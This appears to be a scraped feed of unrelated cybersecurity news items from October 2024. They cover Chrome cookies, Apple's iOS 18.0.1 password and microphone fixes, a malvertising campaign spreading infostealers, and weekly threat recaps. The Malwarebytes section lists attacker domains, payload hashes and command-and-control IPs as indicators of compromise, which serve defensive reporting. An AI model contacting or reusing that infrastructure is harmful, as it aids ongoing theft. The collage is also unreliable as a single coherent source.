Earlier this year, Google ditched its plans to abolish support for third-party cookies in its Chrome browser. While privacy advocates called foul, the implications for users is not so clear cut.

The apparent death of cookies also won’t matter much to Google, which has a ton of data from multiple services in addition to Chrome and can target people without cookies.

According to Google's 2023 earnings report, $237.86 billion of the firm’s $307.39 billion in revenue came from ads. Ads on its search engine results page and other products including Gmail, Google Maps, and Google Play are the highest earner at a collective $175.03 billion, or 56.9 percent of overall revenue. YouTube ads bring in $31.51 billion (10.3 percent of the total), and Google Network ads including ads on Google’s partner sites come in at $31.31 billion, 10.2 percent of revenue. Network ad revenues were down by 4.5 percent last year, showing Google reliance on this area is reducing.

Google knows it’s quite possible privacy-conscious users will opt out of Chrome cookies, just as they did with Apple’s ATT, which saw Facebook taking a $10 billion hit. Now, ATT opt-in rates range from 12 percent to 40 percent across different app categories.

The mobile advertising industry has boomed over recent years, even with Apple’s ATT in place, says Jake Moore, global cybersecurity adviser at security outfit ESET. He calls the results of ATT “impressive” and suggests Google has been watching the outcome of Apple’s rules before implementing its own version.

Meanwhile, Google is already advising developers to act as if they don’t have cookies. The tech giant is working under the assumption that even if 80 percent do opt out, 20 percent of Chrome’s more than 3 billion users isn’t a bad result.

Ensuring users have a conscious choice over whether they use cookies or not is “a good step in practice,” says Simon Bain, CEO at data and analytics platform OmniIndex. But Google needs to consider how easy it is to opt out, he says.

“And is there a negative impact on opting out for users?” Bain says. “These are crucial because if opting out is buried in the privacy settings and there is a reduction in functionality or workflow as a result of not having them, then it is not really a fair or legitimate choice.”

**Informed Choice**

Google says its updated approach allows people to “make an informed choice that applies across their web browsing,” and says you’ll be able to “adjust that choice at any time.”

The plan is for this to be as usable as possible. Sources familiar with the matter confirmed Google’s current plan would be a prominent global prompt, meaning users would not be asked to make choices on a site-by-site basis.

Yet some experts question Google’s motives. Sean Wright, an independent security researcher, points out that Google has “an enormous amount of data on individuals,” which gives a lot of power to “a single entity.”

This level of control could put user privacy at risk, Wright says. “My concern is that you have a large company that is already well established, developing its own ecosystem with little competition. There seems little incentive to enhance the privacy of users.”

But Google argues that it has received feedback from “a wide variety of stakeholders,” including regulators such as the UK’s Competition and Markets Authority, publishers, web developers and standards groups, civil society, and participants in the advertising industry. “This has helped us craft solutions that aim to support a competitive and thriving marketplace that works for publishers and advertisers, and encourage the adoption of privacy-enhancing technologies,” the company says.

Even so, privacy is a difficult balance to strike for the world’s biggest browser whose business model is designed to rely on advertising.

This is already well known, and if you care about your privacy, it’s possible you’ve already ditched Chrome for another browser. If you haven’t, Chrome alternatives include Apple’s Safari, Brave, Vivaldi, Firefox, and the DuckDuckGo browser. Brave and Vivaldi and based on the same Chromium engine as Chrome, so they include some of the same functionality.

What Google's U-Turn on Third-Party Cookies Means for Chrome Privacy

Apple Security Advisory 10-03-2024-1 - iOS 18.0.1 and iPadOS 18.0.1 addresses an audio capturing issue and a logic issue related to passwords being read aloud.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1

iOS 18.0.1 and iPadOS 18.0.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121373.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Media Session  
Available for: iPhone 16 (all models)  
Impact: Audio messages in Messages may be able to capture a few seconds  
of audio before the microphone indicator is activated  
Description: This issue was addressed with improved checks.  
CVE-2024-44207: Michael Jimenez and an anonymous researcher

Passwords  
Available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch  
3rd generation and later, iPad Pro 11-inch 1st generation and later,  
iPad Air 3rd generation and later, iPad 7th generation and later, and  
iPad mini 5th generation and later  
Impact: A user's saved passwords may be read aloud by VoiceOver  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44204: Bistrit Dahal

This update is available through iTunes and Software Update on your  
iOS device, and will not appear in your computer's Software Update  
application, or in the Apple Downloads site. Make sure you have an  
Internet connection and have installed the latest version of iTunes  
from https://www.apple.com/itunes/

iTunes and Software Update on the device will automatically check  
Apple's update server on its weekly schedule. When an update is  
detected, it is downloaded and the option to be installed is  
presented to the user when the iOS device is docked. We recommend  
applying the update immediately if possible. Selecting  
Don't Install will present the option the next time you connect  
your iOS device.

The automatic update process may take up to a week depending on  
the day that iTunes or the device checks for updates. You may  
manually obtain the update via the Check for Updates button  
within iTunes, or the Software Update on your device.

To check that the iPhone, iPod touch, or iPad has been updated:

* Navigate to Settings  
* Select General  
* Select About. The version after applying this update will be  
"iOS 18.0.1 and iPadOS 18.0.1".

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmb/LLMACgkQX+5d1TXa  
Ivp/oBAAtCfF765M4s/Iwi15gaFUFbOe5Droq7gCJEvtwSsfYFESbM5eCiGZjn4y  
Na+d9SrlgymDhIz5j6ZDZdSHKjCLhlkYc+JxpjgUM7rPxJtpn1QBGdDcjUfhpesV  
sPxIaQk3lok4uLdBt9tbDT1a+pI67vKa2hm3FmZHsj5MZLSUJaR3d5rq2MWo3RjD  
dfVsDhdCvnhk0vSA7ro8/EXVX1W6Jq8UQRGMjXcZgTiSWIx4TLdx6cNGD53dPuzl  
ffP6M4XHi247tolr8gs0+EBBlnwUVF1DGgx5MZGuxO++MNLo0SF25HTZN6bmuEQy  
zcQjuOHUzEazRzs9lO6IqAoY+YFQKW/UN3+Fj0RNKl2OXloRf2DTgl1C53V+uVyB  
MdtJtYCJ1YxwKnhzGsmjclk5oqUrtEKL4Yeri1TxbfXBgoFflNLNRgRrwqkIoPKy  
XURcpZ7/yD62Y4uMDIXFWV6FlEPZ/lPnM9Yh7Nh3ocJwJFlsHItuhJrwgyjLkfCZ  
Lnerb7en4FbxEfewnjbdCh06P58e5c3XVVSVGNwIyIxeoTO7lT7E7V9tcaSi1L9s  
QYN5+zcssTumEdbns6mwivpES16Z+4LuQZfgcfynreLZA6B7LHgqXEmSDcujF8SC  
P4hiBFqyccXGrvTR47fGf8+6JPnErrFKOBEcfEu7NUYW8smtxM0=  
=n+NZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-03-2024-1

Malicious Google sponsored results disguised as software downloads lead to malware.

After what seemed like a long hiatus, we’ve observed threat actors returning to malvertising to drop malware disguised as software downloads. The campaign we identified is high-impact, going after utility software such as Slack, Notion, Calendly, Odoo, Basecamp, and others. For this blog, we decided to focus on the Mac version of communication tool Slack.

Following the creation of advertiser identities belonging to real businesses, the threat actors launch their malicious ads, hiding their infrastructure behind several layers of fingerprinting and cloaking.

We have reported these incidents to Google and the related advertisers have been banned. However, we are still finding new malicious ads and hearing from others seeing the same, indicating that this campaign is not over yet.

**Wanted: Utility software**

The threat actor is abusing various platforms to host their payloads, giving insights into what they are choosing to lure in victims. For Windows users, all payloads were found in various GitHub accounts which we have reported already.

For Mac, we saw payloads originating from the same domain via PHP scripts using identifiers. These appear to be created for individual and perhaps time-based downloads. Other links that include the name of the software (i.e. _clockify\_mac.php_) work regardless.

creativekt\[.\]com/macdownloads/script\_6703ea1fc058e8.92130856.php  
creativekt\[.\]com/macdownloads/script\_66ffc3cf465a45.36592714.php  
creativekt\[.\]com/macdownloads/clockify\_mac.php  
creativekt\[.\]com/macdownloads/script\_66e6ba358cd842.42527539.php

**Impersonating two identities at once**

When we searched for Slack from the US, the top Google result was an ad that looked completely trustworthy. It had the brand’s logo, official website and even detailed description.

If you follow this blog, you probably know there is more to it. By clicking on the three dots next to the ad, you can see more information about the advertiser, which in this case is a law firm.

_Note: We understand that most users will not—for lack of time, interest or knowledge—take this step, which is why we offer solutions such as Malwarebytes Browser Guard that automatically blocks ads._

The “My Ad Center” vignette shows that the advertiser was not verified yet, but we were able to access their profile and see their collection of ads. There were four ads in total, and three of them were related to lawyer services using the name and address of a real company in the US.

The Slack ad was somewhat the odd one sticking out but could, in theory, have been promoted by this advertiser. What we believe is the problem with Google ads is how any advertiser can still use the branding of a major company as if they were them. From the point of view of internet users, this is extremely deceiving and provides no rail guard against abuse.

After we validated the ad ourselves and saw where it redirected to (a malicious site), we reported it to Google. Very shortly thereafter, Google took action and removed not just the ad, but the advertiser.

However, a couple of days later a new ad appeared, once again using a stolen identity this time from a women’s health company.

**Decoy site and payload**

As we have seen before, the malicious ad starts a redirection chain made of various click trackers, cloaking and a decoy site. This allows victim profiling, but more importantly it is used to avoid automated detection in order to keep the ad up and running as long as possible.

Victims eventually land on a decoy sites, similar to those used for phishing credentials, except here the end goal is to trick users into downloading malware.

Windows users get their respective payload hosted on GitHub. The binaries have been inflated into large files to hinder sandbox analysis and are likely Rhadamathys infostealer.

For Apple users, the installers are also an infostealer, branched out of the AMOS (Atomic Stealer) family. Passwords and other secrets found on a system within the file system, browsers, extensions and apps are grabbed and uploaded as a zip archive onto a remote server located in Russia:

**Conclusion**

When we investigate ads, we use a simple yet realistic setup that mimics what most users would have. This is not an automated process, which sometimes requires multiple attempts from different geographic locations and browser profiles. While this work can be tedious and time consuming, we believe it is necessary in order to identify threat actors at the source, therefore providing protection to the Malwarebytes customer base, but also anyone else that uses the Google search engine.

Slack is not the only brand that threat actors like to impersonate. In fact, we also saw and reported malicious ads for the productivity suite Notion. We noticed that it also shared the same payload hosting infrastructure, indicating that the two campaigns were related.

If you are still clicking on ads to download software, you take a risk by allowing fraudulent advertisers to redirect you to malicious sites. Inadvertently installing malware and getting your identity stolen has never been easier.

We recommend paying special attention to sponsored results or adopting a tool such as Malwarebytes Browser Guard. For our Mac users, we detect this threat as OSX.Poseidon.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**Indicators of Compromise**

Malicious domains

creativekt\[.\]com  
slack\[.\]designexplorerapp\[.\]net  
odoo\[.\]studioplatformapp\[.\]net  
notion\[.\]foreducationapp\[.\]com  
slack\[.\]workmeetingsapp\[.\]com

Payloads (Windows)

9c8dadbb45f63fb07fd0a6b6c36c7aa37621bbadc1bcc41823c5aad1b0d3e93e  
2b587ca6eb1af162951ade0e214b856f558cc859ae1a8674646f853661704211  
e3557fb78e8fca926cdb16db081960efc78945435b2233fbd80675c21f0bc2e2  
637b3ac5b315fd77b582dff2b55a65605f2782a717bed5aa6ef3c9722e926955  
79017a6a96b19989bcf06d3ceaa42fd124a0a3d7c7fca64af9478e08e6c67c72  
6eb1e3abf8a94951a661513bee49ffdbecfc8f7f225de83fa9417073814d4601  
de7b5e6c7b3cee30b31a05cc4025d0e40a14d5927d8c6c84b6d0853aea097733  
77615ea76aedf283b0e69a0d5830035330692523b505c199e0b408bcccd147b7

Payloads (Mac)

b55f2cb39914d84a4aa5de2f770f1eac3151ca19615b99bda5a4e1f8418221c2  
9dc9c06c73d1a69d746662698ac8d8f4669cde4b3af73562cf145e6c23f0ebdd

Command and control servers

85.209.11\[.\]155  
193.3.19\[.\]251

 Large scale Google Ads campaign targets utility software 

This is a thorough write up of how to exploit a local privilege escalation vulnerability in iTunes for Windows version 12.13.2.3. Apple fixed this in version 12.13.3.

iTunes For Windows 12.13.2.3 Local Privilege Escalation

Apple has fixed a security issue in iOS (and iPadOS) that could have leaked a user's passwords through the VoiceOver feature.

Apple has issued security updates for iOS 18.0.1 and iPadOS 18.0.1 which includes a fix for a bug that could allow a user’s saved passwords to be read aloud by its VoiceOver feature.

VoiceOver allows users to use their iPhone or iPad even if they can’t see the screen. It gives audible descriptions of what’s on your screen—for example, the battery level, who’s calling you, or what item your finger is on.

Unfortunately, that also included an audible description of a user’s saved passwords, effectively reading aloud someone’s passwords.

While the chance of abusing this vulnerability is relatively small—the device would have to be unlocked and in the attacker’s proximity to exploit it—it’s always better to install security updates as soon as possible. Once criminals know vulnerabilities exist they tend to go looking for unpatched vulnerable devices.

The patch for the flaw (listed as CVE-2024-44207) is available for iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.

To check if you’re using the latest software version of iOS and iPadOS, go to **Settings** > **General** > **Software Update**. You want to be on iOS 18.0.1 or iPadOS 18.0.1.

If you’re not on the latest version, you can update from this screen. It’s also worth turning on Automatic Updates if you haven’t already, which you can also do from this screen.

Preferred setting for automatic updates

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 iPhone flaw could read your saved passwords out loud. Update now! 

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.
Get the scoop before it's too late!
⚡ Threat of the Week
Double Trouble: Evil Corp & LockBit Fall: A consortium of international law enforcement agencies took steps to arrest four

Cybersecurity / Weekly Recap

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.

Get the scoop before it's too late!

****⚡ Threat of the Week****

**Double Trouble: Evil Corp & LockBit Fall:** A consortium of international law enforcement agencies took steps to arrest four people and take down nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation. In tandem, authorities outed a Russian national named Aleksandr Ryzhenkov, who was one of the high-ranking members of the Evil Corp cybercrime group and also a LockBit affiliate. A total of 16 individuals who were part of Evil Corp have been sanctioned by the U.K.

  
****🔔 Top News****

*   **DoJ & Microsoft Seize 100+ Russian Hacker Domains:** The U.S. Department of Justice (DoJ) and Microsoft announced the seizure of 107 internet domains used by a Russian state-sponsored threat actor called COLDRIVER to orchestrate credential harvesting campaigns targeting NGOs and think tanks that support government employees and military and intelligence officials.
*   **Record-Breaking 3.8 Tbps DDoS Attack:** Cloudflare revealed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at 3.8 terabits per second (Tbps) and lasted 65 seconds. The attack is part of a broader wave of over a hundred hyper-volumetric L3/4 DDoS attacks that have been ongoing since early September 2024 targeting financial services, Internet, and telecommunication industries. The activity has not been attributed to any specific threat actor.
*   **North Korean Hackers Deploy New VeilShell Trojan:** A North Korea-linked threat actor called APT37 has been attributed as behind a stealthy campaign targeting Cambodia and likely other Southeast Asian countries that deliver a previously undocumented backdoor and remote access trojan (RAT) called VeilShell. The malware is suspected to be distributed via spear-phishing emails.
*   **Fake Trading Apps on Apple and Google Stores:** A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims as part of what's called a pig butchering scam. The apps are no longer available for download. The campaign has been found to target users across Asia-Pacific, Europe, Middle East, and Africa. In a related development, Gizmodo reported that Truth Social users have lost hundreds of thousands of dollars to pig butchering scams.
*   **700,000+ DrayTek Routers Vulnerable to Remote Attacks:** As many as 14 security flaws, dubbed DRAY:BREAK, have been uncovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices. The vulnerabilities have been patched following responsible disclosure.

****📰 Around the Cyber World****

*   **Salt Typhoon Breached AT&T, Verizon, and Lumen Networks:** A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. "The hackers appear to have engaged in a vast collection of internet traffic from internet service providers that count businesses large and small, and millions of Americans, as their customers."
*   **U.K. and U.S. Warn of Iranian Spear-Phishing Activity:** Cyber actors working on behalf of the Iranian Government's Islamic Revolutionary Guard Corps (IRGC) have targeted individuals with a nexus to Iranian and Middle Eastern affairs to gain unauthorized access to their personal and business accounts using social engineering techniques, either via email or messaging platforms. "The actors often attempt to build rapport before soliciting victims to access a document via a hyperlink, which redirects victims to a false email account login page for the purpose of capturing credentials," the agencies said in an advisory. "Victims may be prompted to input two-factor authentication codes, provide them via a messaging application, or interact with phone notifications to permit access to the cyber actors."
*   **NIST NVD Backlog Crisis - 18,000+ CVEs Unanalyzed:** A new analysis has revealed that the National Institute of Standards and Technology (NIST), the U.S. government standards body, has still a long way to go in terms of analyzing newly published CVEs. As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)." It's worth noting that a total of 25,357 new vulnerabilities have been added to NVD since February 12, 2024, when NIST scaled back its processing and enrichment of new vulnerabilities.
*   **Major RPKI Flaws Uncovered in BGP's Cryptographic Defense:** A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges." These vulnerabilities range from denial-of-service and authentication bypass to cache poisoning and remote code execution.
*   **Telegram's Data Policy Shift Pushes Cybercriminals to Alternative Apps:** Telegram's recent decision to give users' IP addresses and phone numbers to authorities in response to valid legal requests is prompting cybercrime groups to seek other alternatives to the messaging app, including Jabber, Tox, Matrix, Signal, and Session. The Bl00dy ransomware gang has declared that it's "quitting Telegram," while hacktivist groups like Al Ahad, Moroccan Cyber Aliens, and RipperSec have expressed an intent to move to Signal and Discord. That said, neither Signal nor Session support bot functionality or APIs like Telegram nor do they have extensive group messaging capabilities. Jabber and Tox, on the other hand, have already been used by adversaries operating on underground forums. "Telegram's expansive global user base still provides extensive reach, which is crucial for cybercriminal activities such as disseminating information, recruiting associates or selling illicit goods and services," Intel 471 said. Telegram CEO Pavel Durov, however, has downplayed the changes, stating "little has changed" and that it has been sharing data with law enforcement since 2018 in response to valid legal requests. "For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3," Durov added.

**🔥 **Cybersecurity Resources & Insights****

*   **LIVE Webinars**
    *   **Modernization of Authentication: Passwords vs Passwordless and MFA:** Are you sure your passwords are enough? Discover the truth about passwordless tech and how MFA can protect you in ways you didn't even know you needed. Join our webinar to get ahead of the next big shift in cybersecurity.
*   **Ask the Expert**
    *   **Q: How can organizations reduce compliance costs while strengthening their security measures?**
    *   **A:** You can reduce compliance costs while strengthening security by smartly integrating modern tech and frameworks. Start by adopting unified security models like NIST CSF or ISO 27001 to cover multiple compliance needs, making audits easier. Focus on high-risk areas using methods like FAIR so your efforts tackle the most critical threats. Automate compliance checks with tools like Splunk or IBM QRadar, and use AI for faster threat detection. Consolidate your security tools into platforms like Microsoft 365 Defender to save on licenses and simplify management. Using cloud services with built-in compliance from providers like AWS or Azure can also cut infrastructure costs. Boost your team's security awareness with interactive training platforms to build a culture that avoids mistakes. Automate compliance reporting using ServiceNow GRC to make documentation easy. Implement Zero Trust strategies like micro-segmentation and continuous identity verification to strengthen defenses. Keep an eye on your systems with tools like Tenable.io to find and fix vulnerabilities early. By following these steps, you can save on compliance expenses while keeping your security strong.
*   **Cybersecurity Tools**
    *   **capa Explorer Web** is a browser-based tool that lets you interactively explore program capabilities identified by capa. It provides an easy way to analyze and visualize capa's results in your web browser. capa is a free, open-source tool by the FLARE team that extracts capabilities from executable files, helping you triage unknown files, guide reverse engineering, and hunt for malware.
    *   **Ransomware Tool Matrix** is an up-to-date list of tools used by ransomware and extortion gangs. Since these cybercriminals often reuse tools, we can use this info to hunt for threats, improve incident responses, spot patterns in their behavior, and simulate their tactics in security drills.

****🔒 Tip of the Week****

**Keep an "Ingredients List" for Your Software:** Your software is like a recipe made from various ingredients—third-party components and open-source libraries. By creating a **Software Bill of Materials (SBOM)**, a detailed list of these components, you can quickly find and fix security issues when they arise. Regularly update this list, integrate it into your development process, watch for new vulnerabilities, and educate your team about these parts. This reduces hidden risks, speeds up problem-solving, meets regulations, and builds trust through transparency.

****Conclusion****

Wow, this week really showed us that cyber threats can pop up where we least expect them—even in apps and networks we trust. The big lesson? Stay alert and always question what's in front of you. Keep learning, stay curious, and let's outsmart the bad guys together. Until next time, stay safe out there!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats and Trends (Sep 30 - Oct 6)

Plus: Harvard students pack Meta’s smart glasses with privacy-invading face-recognition tech, Microsoft and the DOJ seize Russian hackers’ domains, and more.

Pig butchering, the crypto-based scammer scourge that has pulled in an estimated $75 billion from victims globally, is spreading beyond its roots in Southeast Asia, with operations proliferating across the Middle East, Eastern Europe, Latin America, and West Africa.

The UK's National Crime Agency disclosed new details about the identities of the Russian ransomware group known as Evil Corp—as well as the group's ties to Russian intelligence agencies and even its direct participation in espionage operations targeting NATO allies.

A WIRED investigation revealed how car-mounted automatic license plate reader cameras are capturing far more than just license plates, including campaign yard signs, bumper stickers, and other politically sensitive text, all examples of how a system for tracking vehicles threatens to become a broader surveillance tool.

In other news, ICE signed a $2 million contract with Paragon Solutions, a known vendor of spyware including the hacking tool Graphite. And the Pentagon is increasingly adopting handheld controllers for weapons systems in an effort provide more intuitive interfaces to soldiers who have grown up playing Xbox and PlayStation consoles.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

As the politics of America's biggest city have been turned upside down by the criminal charges against New York mayor Eric Adams, there's still a “significant wild card” in the corruption case against him, prosecutors said in court this week: The FBI can't manage to get into his phone.

Prosecutors in the case against Adams, which centers on alleged illegal payments the mayor received from the Turkish government, revealed that the FBI still hasn't cracked the encryption on Adams' personal phone, nearly a year after it was seized. That phone is one of three that the bureau has taken from Adams, but agents seized Adams' personal phone a day later than the other two devices he used in an official capacity. By that time, Adams had not only changed the passcode on the phone from a four digit PIN to six digits—a measure he says he took to prevent staffers from intentionally or unintentionally deleting information from the device. He also claims he immediately “forgot” that code to unlock it.

That very convenient amnesia may leave the FBI and prosecutors in a situation similar to their investigation into the San Bernardino mass shooting carried out by Syed Rizwan Farook in 2016, when the US government demanded Apple help unlock the shooter's encrypted iPhone, leading to a high-profile standoff between the Apple and the FBI. In that case, the cybersecurity firm Azimuth eventually used a closely guarded—and expensive—hacking technique to unlock the device. In Adams' case, prosecutors hinted that the FBI may have to resort to similar measures. “Decryption always catches up with encryption,” a prosecutor in the case, Hagan Scotten, told the judge.

Face recognition is one of only a few technologies that even Facebook and Google have hesitated to integrate into products like Google Glass and the Ray-Ban Meta smart glasses—and rightly so, given the privacy implications of a device that would allow anyone to look at a stranger on the street and immediately determine their phone number and home address. Now, however, a group of Harvard students has shown how easy it is to bolt that face recognition onto Meta's augmented-reality eyewear. The project, known as I-XRAY, integrates with the face-recognition service Pimeyes to let Ray-Ban Meta wearers learn the name of virtually anyone they see and then immediately scour databases of personal information to determine other info about them, including names of family members, phone numbers, and home addresses. The students say they're not releasing the code for their experiment, instead intending it as a demonstration of the privacy-invasive potential of augmented-reality devices. Point made.

If that warning about the privacy risks of AR eyewear needed more reinforcement, Meta this week also conceded to TechCrunch that it will use input from users' smart glasses to train its AI products. Initially, Meta declined to answer TechCrunch's questions about whether and how it would collect information from Ray-Ban Meta smart glasses for use as AI training data, in contrast to companies like OpenAI and Anthropic that explicitly say they don't exploit user inputs to train their AI services. A couple of days later, however, Meta confirmed to TechCrunch that it does in fact use images or video collected through its smart glasses to train its AI, but only if the user submits them to Meta's AI tools. That means anything that a user sees and asks Meta's AI chatbot to comment on or analyze will become part of Meta's massive AI-training data trove.

If you can't arrest Russian hackers, at least you can nab their web domains. That, at least, is the approach this week of the US Justice Department, which along with Microsoft and the NGO Information Sharing and Analysis Center used a lawsuit to take control of more than a hundred web domains that had been used by Russian hackers working for the Kremlin's intelligence and law enforcement agency known as the FSB. Those domains had been exploited in phishing campaigns by the Russian hacker group known as Star Blizzard, which has a history of targeting the typical victims of geopolitical spying such as journalists, think tanks, and NGOs. The domain seizures seem designed in part to head off threats of foreign interference in next month's US election. “Rebuilding infrastructure takes time, absorbs resources, and costs money,” Steven Masada, the assistant general counsel of Microsoft’s Digital Crimes Unit, said in a statement. “Today’s action impacts \[the hackers'\] operations at a critical point in time when foreign interference in US democratic processes is of utmost concern.”

The FBI Still Hasn’t Cracked NYC Mayor Eric Adams’ Phone

Apple has released iOS and iPadOS updates to address two security issues, one of which could have allowed a user's passwords to be read out aloud by its VoiceOver assistive technology.
The vulnerability, tracked as CVE-2024-44204, has been described as a logic problem in the new Passwords app impacting a slew of iPhones and iPads. Security researcher Bistrit Daha has been credited with

Data Privacy / Mobile Security

Apple has released iOS and iPadOS updates to address two security issues, one of which could have allowed a user's passwords to be read out aloud by its VoiceOver assistive technology.

The vulnerability, tracked as CVE-2024-44204, has been described as a logic problem in the new Passwords app impacting a slew of iPhones and iPads. Security researcher Bistrit Daha has been credited with discovering and reporting the flaw.

"A user's saved passwords may be read aloud by VoiceOver," Apple said in an advisory released this week, adding it was resolved with improved validation.

The shortcoming impacts the following devices -

*   iPhone XS and later
*   iPad Pro 13-inch
*   iPad Pro 12.9-inch 3rd generation and later
*   iPad Pro 11-inch 1st generation and later
*   iPad Air 3rd generation and later
*   iPad 7th generation and later, and
*   iPad mini 5th generation and later

Also patched by Apple is a security vulnerability (CVE-2024-44207) specific to the newly launched iPhone 16 models that allows audio to be captured before the microphone indicator is on. It's rooted in the Media Session component.

"Audio messages in Messages may be able to capture a few seconds of audio before the microphone indicator is activated," the iPhone maker noted.

The problem has been fixed with improved checks, it added, crediting Michael Jimenez and an anonymous researcher for reporting it.

Users are advised to update to iOS 18.0.1 and iPadOS 18.0.1 to safeguard their devices against potential risks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases Critical iOS and iPadOS Updates to Fix VoiceOver Password Vulnerability

CVE-2024-44204 is one of two new Apple iOS security vulnerabilities that showcase an unexpected coming together of privacy snafus and accessibility features.

Source: Aleksey Boldin via Alamy Stock Photo

Apple has patched two quirky bugs that might have offended privacy-oriented iPhone and iPad owners.

The first — an issue with Apple's VoiceOver accessibility feature — could have caused iPhones or iPads to announce sensitive passwords out loud. The other issue — affecting voice messages on new iPhone models — could have recorded users for brief seconds before they knew they were being recorded.

New operating system versions are available for both iOS and iPadOS (18.0.1), fixing each bug with improved validation and checks, respectively. Users should update their devices to avoid being vulnerable.

As Michael Covington, vice president of portfolio strategy for Jamf points out, "The good news is that neither of these highlighted issues involve remote exploits. They are, in fact, issues that will arise with use of the device, and it's user privacy that is ultimately at risk."

Still, he says that "for businesses that use mobile in any capacity for work, I recommend they pay close attention to both of the security issues and take appropriate action to update devices as soon as possible."

**Bug #1: Reading Passwords Aloud**

The first issue involves VoiceOver, the accessibility feature that provides visually impaired users with audible descriptions of the various elements on their screens — text, buttons, images, etc. VoiceOver also allows users to navigate their devices using voice commands and gestures.

Perhaps not everything on a device should be read aloud, though, like passwords. Last month, as part of iOS and iPadOS 18, Apple released a brand new app, "Passwords," allowing users to easily store and manage logins on their devices. CVE-2024-44204 is a logic issue that could have allowed VoiceOver to read out such a user's passwords. It affected essentially every model of iPhone and iPad released since 2018.

VoiceOver is off by default, meaning that only select iPhone users were potentially affected.

Covington notes, "This is not the first time we've seen accessibility features misused. Previous instances include screen reader technology being used by misbehaving apps to capture on-screen details and exfiltrate data from the device. Fortunately, most accessibility features go through extensive security and privacy testing, so these scenarios do not tend to arise often."

**Bug #2: Beginning Audio Messages Too Early**

If iPhone users are on the go, have a lot to say, or maybe just have tired thumbs, they might choose to record an audio message in iMessage, instead of a regular text. After they hit that plus sign on the left side of the message box and choose "Audio," the device will indicate that it has started recording with a red-highlighted sound wave in place of the message box, and a little orange dot in the pill-sized Dynamic Island at the top of the screen.

A security researcher recently discovered though that audio messages could have captured a few seconds of audio before users were made aware that their microphone was hot. The issue has been labeled CVE-2024-44207, and affects all models of the new iPhone 16.

Though it might seem — and, in most cases, would be — a relatively minor issue, Covington points out, "this disconnect between device function and the associated visual indicators is something that Jamf’s own threat research team has connected to persistence techniques used by attackers to maintain a presence on the device following a successful exploit. Addressing this bug before it can be misused is a big win for Apple."

Neither the VoiceOver nor the audio message vulnerability has received a rating in the Common Vulnerability Scoring System (CVSS) yet, nor are any further details public at this time.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

iPhone 'VoiceOver' Feature Could Read Passwords Aloud

Computer Laboratory Management System 2024 version 1.0 suffers from a cross site scripting vulnerability.

